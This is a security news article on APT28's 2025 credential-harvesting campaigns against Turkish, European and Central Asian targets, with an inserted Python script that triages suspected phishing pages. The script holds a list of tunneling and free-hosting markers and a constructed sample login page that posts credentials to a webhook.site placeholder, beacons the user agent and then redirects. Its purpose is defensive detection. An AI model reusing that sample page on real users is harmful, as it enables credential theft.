Credential-harvesting attacks by APT28 hit Turkish, European, and Central Asian organizations

Russia-linked cyberespionage group APT28 targets energy, nuclear, and policy staff in Turkey, Europe, North Macedonia, and Uzbekistan with credential-harvesting attacks.

Between February and September 2025, Recorded Future’s Insikt Group observed Russia-linked group APT28 (aka UAC-0001, Fancy Bear, Pawn Storm, Sofacy Group, Sednit, BlueDelta, and STRONTIUM) running credential-harvesting campaigns. Targets included Turkish energy and nuclear agency staff, European think tank personnel, and organizations in North Macedonia and Uzbekistan. The cyber espionage group used regionally tailored lures, reflecting interest in energy, defense, and government networks aligned with Russian intelligence priorities. This marks an expansion of its ongoing operations.

APT28 used fake login pages mimicking Outlook, Google, and Sophos VPN to steal credentials, redirecting victims to real sites. They relied on free hosting, tunneling services, and PDF lures, showing the GRU’s ongoing, low-cost focus on credential harvesting for intelligence purposes.

“BlueDelta expanded its credential-harvesting operations throughout 2025, deploying new campaigns themed as Microsoft Outlook Web Access (OWA), Google, and Sophos VPN login portals.

The group leveraged a combination of free hosting and tunneling services, including Webhook[.]site, InfinityFree, Byet Internet Services, and ngrok, to host credential-harvesting pages and exfiltrate stolen data.” reads the report published by the Insikt Group.

“Multiple campaigns incorporated legitimate PDF lure documents, such as publications from the Gulf Research Center and the EcoClimate Foundation, to increase the appearance of authenticity and bypass email security controls.”

The campaigns redirected victims to legitimate sites after credential theft to avoid detection. They used free hosting and tunneling services like Webhook[.]site, InfinityFree, Byet Internet Services, and ngrok to host phishing pages, exfiltrate data, and enable redirects.

To appear credible, attackers embedded real PDF lures, including Gulf Research Center and ECCO publications. Phishing emails led to decoy PDFs for a few seconds before showing spoofed Microsoft OWA pages that secretly sent credentials to webhook endpoints, then redirected users back to legitimate content.

BlueDelta ran credential‑harvesting campaigns using free hosting and tunneling services to keep costs low and infrastructure disposable. In February 2025, it deployed spoofed Microsoft OWA login pages delivered through shortened links and Webhook[.]site. Victims were first shown legitimate PDF lures from trusted think tanks, then redirected to fake login pages that captured emails, passwords, IPs, and user agents via hidden HTML and JavaScript beacons, before redirecting back to the real PDFs. Later campaigns reused the same approach with updated scripts, Turkish‑language lures, and targets tied to energy research, highlighting BlueDelta’s iterative refinement of low‑effort, high‑yield credential theft.

APT28 continued its credential-harvesting campaigns in 2025, targeting VPNs, Microsoft OWA, and Google accounts. On June 4, they deployed a Sophos VPN password-reset spoof page hosted on a free InfinityFree domain, capturing victim credentials via JavaScript that extracted unique identifiers from the URL and sent them to attacker-controlled endpoints before redirecting to a legitimate VPN portal, likely the intended target.

In September, the cyberespionage group used similar techniques on OWA expired-password pages hosted on InfinityFree domains, redirecting victims to legitimate login pages of a North Macedonian military organization and an IT firm in Uzbekistan.

In April, Portuguese-language Google password-reset phishing pages were hosted on free domains (Byet Internet Services and InfinityFree) using ngrok proxies to exfiltrate credentials. The campaign reused tradecraft from previous attacks, including hidden HTML forms, JavaScript validation, and staged redirection, showing BlueDelta’s persistent use of low-cost, disposable infrastructure for targeted credential theft.
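The three campaigns above share one page-level pattern: a login form whose submission leaves the page's own origin for a free-hosting or tunneling endpoint, hidden fields populated by a beacon that records the user agent, and a scripted redirect to a legitimate site once the credentials are gone. The following script is an added example, not code from the Insikt Group report or from Security Affairs: it takes the HTML of a fetched page plus the URL it was served from and scores those indicators so an analyst can triage suspected phishing URLs. The provider host list, the sample pages and every domain in them are constructed placeholders (the report names the services, not the specific domains).

```python
"""Heuristic triage of a suspected credential-harvesting page (added example)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed, illustrative markers for the providers named in the report.
# Real deployments maintain their own list; matching is by substring.
FREE_HOSTING_TUNNELING = ("webhook.site", "ngrok", "infinityfree", "byethost")


class _Collector(HTMLParser):
    """Extract the page features the heuristics below look at."""

    def __init__(self):
        super().__init__()
        self.form_actions, self.input_types, self.inline_js = [], [], []
        self.hidden_inputs, self.meta_refresh, self._in_script = 0, [], False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "input":
            t = (a.get("type") or "text").lower()
            self.input_types.append(t)
            self.hidden_inputs += t == "hidden"
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = re.search(r"url\s*=\s*['\"]?([^'\"]+)", a.get("content") or "", re.I)
            if m:
                self.meta_refresh.append(m.group(1))
        elif tag == "script" and not a.get("src"):
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline_js.append(data)


def _host(url):
    return (urlparse(url).hostname or "").lower()


def _is_free_infra(host):
    return any(marker in host for marker in FREE_HOSTING_TUNNELING)


# Credential submission leaving the page's origin is the strongest single signal.
WEIGHTS = {"password_field": 1, "cross_origin_form_action": 3,
           "free_hosting_or_tunnel_endpoint": 3, "multiple_hidden_inputs": 1,
           "collects_user_agent": 1, "redirect_to_other_domain": 2,
           "page_hosted_on_free_infra": 2}


def triage_login_page(page_url, html):
    """Return (score, indicators) for a fetched page; higher means more suspicious."""
    c = _Collector()
    c.feed(html)
    page_host, js, found = _host(page_url), "\n".join(c.inline_js), []
    outbound = c.form_actions + re.findall(r"https?://[^\s'\"()]+", js)
    redirects = c.meta_refresh + re.findall(
        r"(?:window\.)?location(?:\.href)?\s*=\s*['\"](https?://[^'\"]+)", js)

    if "password" in c.input_types:
        found.append("password_field")
    if any(_host(u) and _host(u) != page_host for u in c.form_actions):
        found.append("cross_origin_form_action")
    if any(_is_free_infra(_host(u)) for u in outbound):
        found.append("free_hosting_or_tunnel_endpoint")
    if c.hidden_inputs >= 2:
        found.append("multiple_hidden_inputs")
    if "navigator.userAgent" in js:
        found.append("collects_user_agent")
    if any(_host(u) != page_host for u in redirects):
        found.append("redirect_to_other_domain")
    if _is_free_infra(page_host):
        found.append("page_hosted_on_free_infra")
    return sum(WEIGHTS[i] for i in found), found


# Constructed sample modelled on the described flow; all domains are placeholders.
SUSPICIOUS_URL = "https://owa-lure.byethost-placeholder.example/owa/"
SUSPICIOUS_HTML = """<html><body>
<form method="post" action="https://webhook.site/PLACEHOLDER-TOKEN">
  <input type="text" name="email"><input type="password" name="pw">
  <input type="hidden" name="ua" id="ua"><input type="hidden" name="ref" value="x">
</form>
<script>
  document.getElementById('ua').value = navigator.userAgent;
  function done() { window.location.href = "https://thinktank.example/report.pdf"; }
</script></body></html>"""

# Constructed benign comparison: same-origin OWA form, no beacon, no redirect.
BENIGN_URL = "https://mail.example.org/owa/"
BENIGN_HTML = """<html><body><form method="post" action="/owa/auth.owa">
<input type="text" name="username"><input type="password" name="password">
<input type="hidden" name="flags" value="4"></form></body></html>"""

if __name__ == "__main__":
    for url, html in ((SUSPICIOUS_URL, SUSPICIOUS_HTML), (BENIGN_URL, BENIGN_HTML)):
        print(url, triage_login_page(url, html))
```

The score is a triage aid, not a verdict: a legitimate single-sign-on page can also post cross-origin, so the weights exist to rank candidates for a human to open in a sandbox, and the indicator names carry into a case note or detection rule unchanged.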

“Insikt Group has not previously observed BlueDelta using Google-themed credential-harvesting pages in its past campaigns; however, the consistent use of Byet and InfinityFree domains, together with ngrok for exfiltration, and additional tradecraft similarities point to a likely overlap. Based on these parallels, we assess that this activity is likely associated with BlueDelta.” concludes the report that includes Indicators of Compromise (IoCs) and mitigations.

The APT28 group has been active since at least 2007, and it has targeted governments, militaries, and security organizations worldwide. The group was also involved in the string of attacks that targeted the 2016 Presidential election.

The group operates out of military unit 26165 of the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS).

Russian GRU Unit 26165 has targeted dozens of Western logistics and tech firms tied to Ukraine aid, including defense, maritime, air, and rail sectors across NATO nations and Ukraine. They exploited business ties to expand access, even probing ICS makers for railway systems. Targets span 13 countries, including the U.S., Germany, and France.

Pierluigi Paganini

(SecurityAffairs – hacking, Russia)